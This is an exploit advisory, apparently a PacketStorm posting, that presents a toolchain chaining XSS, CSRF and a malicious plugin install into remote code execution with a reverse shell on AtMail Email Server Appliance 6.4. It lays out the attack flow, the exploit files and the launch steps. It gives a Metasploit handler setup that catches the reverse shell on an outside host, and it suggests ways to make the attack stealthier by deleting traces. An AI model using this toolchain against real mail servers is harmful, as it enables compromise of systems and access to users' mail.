AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS > CSRF > RCE)

[PacketStorm] [WLB-2020080010]

Disclaimer: this exploit toolchain was inspired by EDB-ID 20009.

Goal

The goal of this exploit toolchain is to replace EDB-ID 20009.

Pros of this toolchain over EDB-ID 20009 exploit:

• Simple to use
• Reusable
• Dynamically generated payloads
• Easily editable / hackable
• Clear code and plugin available

Cons of EDB-ID 20009 exploit:

• Not customizable (static hardcoded payloads)
• Complex to use (need to replace many hardcoded values and adapt the code to suite the target environment)
• Oneshot use (all values hardcoded)
• The plugin archive tgz is embedded as string (hex chars) so the plugin source code can't be easily read or modified

Requirements

• (Optional) Metasploit Framework (msfvenom for reverse shell generation)
• tar (to generate the plugin archive)
• ruby (payloads preparation and XSS SMTP delivery)
• (Optional) A web server to deliver the XSS payload
• Knowing an Atmail admin email address (only admins can install a plugin)
• Passive interaction (the admin needs to trigger the email containing the XSS payload on the WebMail and to have a valid administration interface session running)

Install requirements on ArchLinux:

$ sudo pacman -S metasploit tar ruby

How it works

1. Sending an email to the admin containing a XSS payload
2. The XSS payload remotely load the JavaScript CSRF
3. The CSRF install a plugin
4. When installed the plugin execute a system command: the reverse shell

Exploit files:

• config.yml contains the toolchain configuration
• exploit.sh the exploit wrapper that need to be executed
• xss_mail.rb will send the email containing the XSS to the admin via Atmail SMTP server (unauthenticated).
• csrf_prepare.rb will prepare the CSRF payload (setting the target and encoding the plugin archive)
• rce_prepare.rb will prepare the RCE (generating the reverse shell and creating the plugin archive)
• csrf_plugin.js the prepared CSRF payload
• noraj/ folder containing the uncompressed plugin architecture

Usage

The exploit toolchain requires only 2 manual steps:

1. Edit config.yml
2. Launch exploit.sh

But before launching the attack, a web server need to deliver the JavaScript CSRF file and a reverse shell listener need to be waiting the connection. So the attack will more looks like:

1. Edit config.yml
2. Start a HTTP server that will deliver csrf_plugin.js
3. Start the reverse shell listener
4. Launch exploit.sh

Example of oneline HTTP server:

$ ruby -run -e httpd . -p 8000

Example of reverse shell listener:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run

Notes

• The RCE occurs only when the plugin is installed, if the reverse shell connection is lost, re-executing means re-installing the plugin. So the admin only needs to reload his mailbox.
• Red teamers could enhance the exploit to auto-remove the email once read and to remove the plugin once the reverse shell connection is established: less persistent but more stealth.
• msfvenom (MSF 5.0) only supports an IP address for LHOST, not a domain.
• As said in Requirements the admin needs to be connect on both the Webmail and the administration interface.
• Tested with ruby 2.7.